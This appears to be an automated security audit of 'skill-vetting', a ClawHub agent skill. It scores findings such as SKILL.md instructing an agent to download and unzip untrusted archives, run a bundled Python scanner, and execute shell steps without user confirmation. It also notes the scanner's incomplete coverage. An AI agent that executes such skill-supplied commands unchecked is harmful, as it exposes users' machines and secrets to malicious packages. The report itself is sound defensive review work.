Is skill-vetting safe?
https://clawhub.ai/eddygk/skill-vetting
This skill is a security vetting tool for ClawHub skills that bundles a Python scanner and instructs the agent to download, extract, and scan arbitrary skill packages. While the skill itself contains no overtly malicious code and the scanner is a legitimate security tool, the workflow creates significant risk by directing agents to download and extract untrusted archives and execute a bundled Python script. The scanner provides incomplete coverage, potentially creating a false sense of security. SSH host key access during installation is likely environmental but warrants noting.
Category Scores
Findings (9)
HIGH Skill instructs agent to download and extract arbitrary zip archives -30 ▶
The SKILL.md workflow directs the agent to run 'curl -L -o skill.zip' followed by 'unzip' on packages downloaded from auth.clawdhub.com. While the download source is a documented API, the contents of downloaded packages are untrusted and could contain malicious files (git hooks, symlinks, compiled binaries) that execute on extraction or access.
HIGH Bundled Python script executed via shell -25 ▶
The skill bundles scan.py (148 lines) and instructs the agent to execute it via 'python3 ~/.openclaw/workspace/skills/skill-vetting/scripts/scan.py'. While the script appears benign (regex-based pattern matching), it establishes a pattern where the agent runs skill-provided code directly. If this file were modified after installation, it could execute arbitrary Python.
MEDIUM Implicit shell command execution instructions -25 ▶
SKILL.md contains multiple code blocks with shell commands presented as a workflow the agent should follow. An LLM agent interpreting this skill may automatically execute these commands (curl, unzip, python3, grep, cat) without explicit user confirmation for each step, effectively granting the skill shell execution through prompt-based instruction.
MEDIUM Incomplete scanner creates false sense of security -20 ▶
scan.py only detects Python-specific patterns (eval, exec, subprocess, requests). It does not scan for: shell script exploits, JavaScript/Node.js attacks, git hooks, .gitattributes filter commands, symlinks to sensitive files, or compiled binaries. A skill passing this scanner could still be malicious through vectors the scanner doesn't cover.
MEDIUM SSH host keys accessed during installation phase -30 ▶
Filesystem monitoring detected reads of /etc/ssh/ssh_host_rsa_key, ssh_host_ecdsa_key, and ssh_host_ed25519_key during the clone/install phase. While this is likely caused by sshd initialization in the sandbox environment rather than the skill itself, it is notable that private key material was accessed.
LOW External URL dependency for skill downloads -5 ▶
The skill hardcodes auth.clawdhub.com as the download endpoint. If this domain were compromised or DNS-hijacked, the agent would download and extract malicious packages. The skill does not verify checksums or signatures of downloaded packages.
LOW Scanner reads all text file contents recursively -15 ▶
scan.py reads the full contents of all text files in the target directory via file_path.read_text(). While this is necessary for its scanning function, if the scan target were pointed at a sensitive directory instead of /tmp, it would ingest credentials and secrets into memory.
INFO Meta-skill risk: vetting tool could normalize downloading unknown packages -5 ▶
By providing a structured 'vetting workflow', this skill normalizes the practice of downloading and extracting untrusted packages. Users may develop a false sense of safety from the automated scanner, leading them to install skills they would otherwise reject.
INFO No npm scripts, git hooks, or submodules 0 ▶
The skill has no package.json install scripts, no .githooks directory, no .gitattributes filters, no git submodules, and no symlinks. The clone itself is clean.